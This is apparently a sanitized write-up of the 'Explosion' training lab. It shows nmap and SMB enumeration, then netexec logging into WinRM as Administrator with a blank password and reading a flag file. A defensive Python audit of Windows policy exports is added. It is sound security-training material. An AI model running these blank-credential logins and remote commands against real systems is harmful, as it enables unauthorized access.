
Walkthrough -- Explosion (<TARGET>)

Open ports: 135 (MSRPC), 139 (NetBIOS), 445 (SMB), 3389 (RDP) Additional ports: 5985 (WinRM), 47001 (WinRM alt), 49664-49671 (RPC high ports) - Guest access works but only reads IPC$ - No custom shares -- only ADMIN$, C$,

Easy | Published 2026-06-10 | Sanitized local writeup

Objective

Machine walkthrough focused on evidence, validation, and reusable operator lessons.

[Figure: Walkthrough -- Explosion (<TARGET>) sanitized attack graph]

Walkthrough flow

  1. SMB guest access allowed but no interesting shares...
  2. Administrator account has a BLANK credential
  3. WinRM accessible with Administrator:'' -- Pwn3d!
  4. RDP also accessible with same creds (not tested...
  5. Nmap scan reveals RDP (3389) and WinRM (5985)

Source coverage

Moderate source coverage

Status: partial. This article is generated from 2 sanitized Markdown sources and keeps raw flags, credentials, keys, cookies, and reusable secrets out of the rendered blog.

54% coverage

Evidence verdict

Moderate confidence: the page is useful for review, but it should be treated as partial because the available source material is thinner or less narrative-complete.

  • <TARGET>-Explosion/walkthrough.md
  • HTB/<TARGET>-Explosion/notes.md

Technical Walkthrough

Walkthrough -- Explosion (<TARGET>)

Machine Info

  • Name: Explosion
  • OS: Windows Server 2019 (Build 17763)
  • Difficulty: Easy (Starting Point)
  • IP: <TARGET>

Enumeration

Initial Nmap Scan

bash
nmap -sC -sV -oN ./nmap/initial <TARGET>

Open ports: 135 (MSRPC), 139 (NetBIOS), 445 (SMB), 3389 (RDP)

Full TCP Scan

bash
nmap -p<redacted> --min-rate 5000 -oN ./nmap/allports <TARGET>

Additional ports: 5985 (WinRM), 47001 (WinRM alt), 49664-49671 (RPC high ports)

SMB Enumeration

bash
smbclient -N -L //<TARGET>/
netexec smb <TARGET> --shares -u 'guest' -p ''

  • Guest access works but only reads IPC$
  • No custom shares -- only ADMIN$, C$, IPC$
  • Dead end for file-based intel

Exploitation

Blank Password on Administrator via WinRM

The box name "Explosion" and the Easy/Starting Point difficulty suggest trying default/blank credentials.

bash
netexec winrm <TARGET> -u Administrator -p ''

Output:

text
WINRM  <TARGET>  5985  <secret redacted>  [+] Explosion\Administrator: (Pwn3d!)

The Administrator account has a blank password, so WinRM gives us direct command execution as the local Administrator (SYSTEM-equivalent privileges).

Flag Capture

bash
netexec winrm <TARGET> -u Administrator -p '' -x 'type C:\Users\Administrator\Desktop\flag.txt'

Flag: <hash redacted>

Lessons Learned

  1. Always try blank/default passwords on Easy boxes, especially when RDP or WinRM is exposed.
  2. WinRM (5985) is an excellent alternative to RDP for command execution -- no GUI needed.
  3. netexec is the go-to tool for testing credentials across Windows services (SMB, WinRM, RDP, MSSQL).
  4. The box teaches the concept of remote desktop services and the danger of blank/default Administrator passwords.
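
On the defensive side, Windows normally restricts blank-password local accounts to console logon through the "Accounts: Limit local account use of blank passwords to console logon only" policy (registry value LimitBlankPasswordUse), so a blank Administrator password only works over WinRM or RDP when that control is off. The following is an added example, not part of the original writeup: a Python audit of a `secedit /export /cfg` policy export that flags the settings behind this attack path. The sample export, the `audit_policy` function name, and the check table are constructed for illustration.

```python
import configparser

# Constructed sample of a `secedit /export /cfg policy.inf` export (not from the target).
# Real exports are UTF-16: open(path, encoding="utf-16").read()
SAMPLE_INF = r"""
[Unicode]
Unicode=yes
[System Access]
MinimumPasswordLength = 0
LockoutBadCount = 0
EnableGuestAccount = 1
[Registry Values]
MACHINE\System\CurrentControlSet\Control\Lsa\LimitBlankPasswordUse=4,0
[Version]
signature="$CHICAGO$"
"""

LSA_BLANK = r"MACHINE\System\CurrentControlSet\Control\Lsa\LimitBlankPasswordUse"

# [System Access] setting -> (risky value, why it matters for this attack path)
ACCESS_CHECKS = {
    "MinimumPasswordLength": ("0", "an empty password can be set on any account"),
    "LockoutBadCount": ("0", "no lockout, so password guessing is unthrottled"),
    "EnableGuestAccount": ("1", "Guest account is enabled (guest SMB access)"),
}

def audit_policy(inf_text):
    """Return [(setting, reason)] for settings that allow blank-password remote logon."""
    cp = configparser.ConfigParser(delimiters=("=",), interpolation=None, strict=False)
    cp.read_string(inf_text)
    findings = []
    # Registry entries are "<type>,<data>" (type 4 = REG_DWORD). Windows ships with
    # data 1: blank-password local accounts may only log on at the console.
    raw = cp.get("Registry Values", LSA_BLANK, fallback="4,1")
    if raw.split(",", 1)[-1].strip() == "0":
        findings.append(("LimitBlankPasswordUse",
                         "blank passwords accepted for network logon (WinRM, RDP, SMB)"))
    for setting, (risky, reason) in ACCESS_CHECKS.items():
        if cp.get("System Access", setting, fallback="").strip() == risky:
            findings.append((setting, reason))
    return findings

if __name__ == "__main__":
    for setting, reason in audit_policy(SAMPLE_INF):
        print(f"[!] {setting}: {reason}")
```

A missing LimitBlankPasswordUse entry is treated as the Windows default (enabled), so only an explicit 0 is reported.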

Tools Used

  • nmap (port scanning and service detection)
  • smbclient (SMB null session enumeration)
  • netexec (credential testing and command execution via WinRM)

Source-Backed Dossier

The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.

Notes

Scope

  • Target: <TARGET> (Explosion)
  • OS: Windows Server 2019 Build 17763
  • Difficulty: Easy (Starting Point)
  • Attacker VPN IP: <TARGET>
  • Pwnbox: x08@<TARGET>
  • Start Time: 2026-05-05
  • Solve Time: ~5 minutes

Open Services

| Port | Service | Notes |
|------|---------|-------|
| 135 | MSRPC | Windows RPC |
| 139 | NetBIOS | |
| 445 | SMB | Signing disabled, guest access (IPC$ only) |
| 3389 | RDP | Microsoft Terminal Services |
| 5985 | WinRM | HTTP-based remote management |
| 47001 | WinRM (alt) | |
| 49664-49671 | MSRPC high ports | Dynamic RPC |

Key Findings

  1. SMB guest access allowed but no interesting shares (only ADMIN$, C$, IPC$)
  2. Administrator account has a BLANK password
  3. WinRM accessible with Administrator:'' -- Pwn3d!
  4. RDP also accessible with same creds (not tested interactively since WinRM was sufficient)

Attack Path

  1. Nmap scan reveals RDP (3389) and WinRM (5985)
  2. netexec winrm with Administrator and blank password: <redacted>
  3. Flag read directly via WinRM command execution

Flags

  • flag.txt: <hash redacted>